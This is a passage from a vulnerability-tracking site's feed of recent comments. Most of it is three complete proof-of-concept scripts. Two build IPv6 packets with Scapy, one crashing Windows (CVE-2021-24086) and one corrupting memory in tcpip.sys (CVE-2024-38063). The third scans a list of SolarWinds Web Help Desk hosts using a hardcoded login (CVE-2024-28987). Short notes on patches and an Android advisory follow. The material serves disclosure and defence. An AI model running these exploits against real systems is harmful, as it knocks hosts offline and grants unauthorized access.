Most recent comment. 2024-11-12T00:33:59.510950+00:00 Vulnerability Lookup python-feedgen Contains only the most 10 recent comments. Analysis of a Windows IPv6 Fragmentation Vulnerability: CVE-2021-24086 2024-11-12T00:33:59.518977+00:00 Cédric Bonhomme [Analysis of a denial of service vulnerability affecting the IPv6 stack of Windows]( This issue, whose root cause can be found in the mishandling of IPv6 fragments, was patched by Microsoft in their February 2021 security bulletin. ### Proof of Concept ```python import sys import random from scapy.all import * FRAGMENT_SIZE = 0x400 LAYER4_FRAG_OFFSET = 0x8 NEXT_HEADER_IPV6_ROUTE = 43 NEXT_HEADER_IPV6_FRAG = 44 NEXT_HEADER_IPV6_ICMP = 58 def get_layer4(): er = ICMPv6EchoRequest(data = "PoC for CVE-2021-24086") er.cksum = 0xa472 return raw(er) def get_inner_packet(target_addr): inner_frag_id = random.randint(0, 0xffffffff) print("**** inner_frag_id: 0x{:x}".format(inner_frag_id)) raw_er = get_layer4() # 0x1ffa Routing headers == 0xffd0 bytes routes = raw(IPv6ExtHdrRouting(addresses=[], nh = NEXT_HEADER_IPV6_ROUTE)) * (0xffd0//8 - 1) routes += raw(IPv6ExtHdrRouting(addresses=[], nh = NEXT_HEADER_IPV6_FRAG)) # First inner fragment header: offset=0, more=1 FH = IPv6ExtHdrFragment(offset = 0, m=1, id=inner_frag_id, nh = NEXT_HEADER_IPV6_ICMP) return routes + raw(FH) + raw_er[:LAYER4_FRAG_OFFSET], inner_frag_id def send_last_inner_fragment(target_addr, inner_frag_id): raw_er = get_layer4() ip = IPv6(dst = target_addr) # Second (and last) inner fragment header: offset=1, more=0 FH = IPv6ExtHdrFragment(offset = LAYER4_FRAG_OFFSET // 8, m=0, id=inner_frag_id, nh = NEXT_HEADER_IPV6_ICMP) send(ip/FH/raw_er[LAYER4_FRAG_OFFSET:]) def trigger(target_addr): inner_packet, inner_frag_id = get_inner_packet(target_addr) ip = IPv6(dst = target_addr) hopbyhop = IPv6ExtHdrHopByHop(nh = NEXT_HEADER_IPV6_FRAG) outer_frag_id = random.randint(0, 0xffffffff) fragmentable_part = [] for i in range(len(inner_packet) // FRAGMENT_SIZE): fragmentable_part.append(inner_packet[i * FRAGMENT_SIZE: (i+1) * FRAGMENT_SIZE]) if len(inner_packet) % FRAGMENT_SIZE: fragmentable_part.append(inner_packet[(len(fragmentable_part)) * FRAGMENT_SIZE:]) print("Preparing frags...") frag_offset = 0 frags_to_send = [] is_first = True for i in range(len(fragmentable_part)): if i == len(fragmentable_part) - 1: more = 0 else: more = 1 FH = IPv6ExtHdrFragment(offset = frag_offset // 8, m=more, id=outer_frag_id, nh = NEXT_HEADER_IPV6_ROUTE) blob = raw(FH/fragmentable_part[i]) frag_offset += FRAGMENT_SIZE frags_to_send.append(ip/hopbyhop/blob) print("Sending {} frags...".format(len(frags_to_send))) for frag in frags_to_send: send(frag) print("Now sending the last inner fragment to trigger the bug...") send_last_inner_fragment(target_addr, inner_frag_id) if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: <IPv6 addr>') sys.exit(1) trigger(sys.argv[1]) ``` 2024-08-30T12:27:27.331911+00:00 Proof of Concept for CVE-2024-38063 - Remote Code Execution Vulnerability in tcpip.sys 2024-11-12T00:33:59.518901+00:00 Cédric Bonhomme [Proof of Concept for CVE-2024-38063](, a RCE in tcpip.sys patched on August 13th 2024. An [analysis of the vulnerability]( published on August 27, 2024 by Marcus Hutchins. PoC published on GitHub on August 24, 2024. ### Implementation Implementation details are available on [GitHub]( ```python from scapy.all import * iface='' ip_addr='' mac_addr='' num_tries=20 num_batches=20 def get_packets_with_mac(i): frag_id = 0xdebac1e + i first = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)]) second = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 1, offset = 0) / 'aaaaaaaa' third = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 0, offset = 1) return [first, second, third] def get_packets(i): if mac_addr != '': return get_packets_with_mac(i) frag_id = 0xdebac1e + i first = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)]) second = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 1, offset = 0) / 'aaaaaaaa' third = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 0, offset = 1) return [first, second, third] final_ps = [] for _ in range(num_batches): for i in range(num_tries): final_ps += get_packets(i) + get_packets(i) print("Sending packets") if mac_addr != '': sendp(final_ps, iface) else: send(final_ps, iface) for i in range(60): print(f"Memory corruption will be triggered in {60-i} seconds", end='\r') time.sleep(1) print("") ``` 2024-08-30T12:36:21.633241+00:00 Proof-of-Concept 2024-11-12T00:33:59.518827+00:00 Cédric Bonhomme A PoC is available here: ```python import argparse import base64 import requests # Created by Ghost sec. RED = "\033[91m" GREEN = "\033[92m" BOLD = "\033[1m" RESET = "\033[0m" ascii_art = f""" {BOLD}{RED} ______ __ __ / \ / | / | /$$$$$$ |$$ |____ ______ _______ _$$ |_ _______ ______ _______ $$ | _$$/ $$ \ / \ / |/ $$ | / | / \ / | $$ |/ |$$$$$$$ |/$$$$$$ |/$$$$$$$/ $$$$$$/ /$$$$$$$/ /$$$$$$ |/$$$$$$$/ $$ |$$$$ |$$ | $$ |$$ | $$ |$$ \ $$ | __ $$ \ $$ $$ |$$ | $$ \__$$ |$$ | $$ |$$ \__$$ | $$$$$$ | $$ |/ | $$$$$$ |$$$$$$$$/ $$ \_____ $$ $$/ $$ | $$ |$$ $$/ / $$/ $$ $$/ / $$/ $$ |$$ | $$$$$$/ $$/ $$/ $$$$$$/ $$$$$$$/ $$$$/ $$$$$$$/ $$$$$$$/ $$$$$$$/ PROOF OF CONCEPT CVE-2024-28987 || SCANNING VULNERABILITY POC || {RESET} """ print(ascii_art) def get_basic_auth_header(username, password): credentials = f"{username}:{password}" base64_credentials = base64.b64encode(credentials.encode()).decode('utf-8') return {'Authorization': f'Basic {base64_credentials}'} def scan_target(hostname): # Ensure hostname does not have trailing slashes hostname = hostname.strip().rstrip('/') url = f"http://{hostname}/helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/" # Print formatted URL for debugging print(f"{BOLD}[*] Scanning URL: {url}{RESET}") headers = get_basic_auth_header("helpdeskIntegrationUser", "dev-C4F8025E7") headers['Content-Type'] = 'application/x-www-form-urlencoded' try: response = requests.get(url, headers=headers, timeout=10) if response.status_code == 200 and 'displayClient' in response.text and 'shortDetail' in response.text: print(f"{BOLD}{GREEN}[+] Vulnerability confirmed on {hostname} with username: 'helpdeskIntegrationUser' and password: 'dev-C4F8025E7'{RESET}") else: print(f"{BOLD}{RED}[-] No vulnerability detected on {hostname}{RESET}") except requests.RequestException: # Modify this line to just print "Not vulnerable" instead of the error details print(f"{BOLD}{RED}[-] Not vulnerable on {hostname}{RESET}") def scan_targets_from_file(file_path): try: with open(file_path, 'r') as file: targets = file.readlines() if not targets: print(f"{BOLD}{RED}[!] No targets found in file{RESET}") return for target in targets: target = target.strip() if target: scan_target(target) except FileNotFoundError: print(f"{BOLD}{RED}[!] File {file_path} not found{RESET}") except Exception as e: print(f"{BOLD}{RED}[!] An error occurred: {e}{RESET}") def main(): parser = argparse.ArgumentParser(description="CVE-2024-28987 Scanner - SolarWinds Web Help Desk Hardcoded Credential") parser.add_argument('-f', '--file', type=str, required=True, help='File containing list of targets') args = parser.parse_args() scan_targets_from_file(args.file) if __name__ == "__main__": main() ``` 2024-10-18T22:23:49.363557+00:00 Availability of a patch 2024-11-12T00:33:59.518745+00:00 Cédric Bonhomme The company released [a patch]( in Web Help Desk version 12.8.3 HF2, which addresses this vulnerability. Users are strongly advised to update their software to this version or later to protect against this flaw. 2024-10-18T22:26:03.012172+00:00 Patches released previously did not completely mitigate the vulnerability 2024-11-12T00:33:59.518625+00:00 Cédric Bonhomme VMware has determined that the vCenter patches released previously did not completely mitigate the vulnerability. 2024-10-22T13:20:32.036514+00:00 Google Warns of Actively Exploited CVE-2024-43093 Vulnerability in Android System 2024-11-12T00:33:59.516512+00:00 Cédric Bonhomme > « Nov 05, 2024 Ravie LakshmananMobile Security / Vulnerability Vulnerability in Android System Google has warned that a security flaw impacting its Android operating system has come under active exploitation in the wild. The vulnerability, tracked as CVE-2024-43093, has been described as a privilege escalation flaw in the Android Framework component that could result in unauthorized access to "Android/data," "Android/obb," and "Android/sandbox" directories, and their respective sub-directories, according to a code commit message.» [Android Security Bulletin November 2024]( 2024-11-08T08:49:29.657124+00:00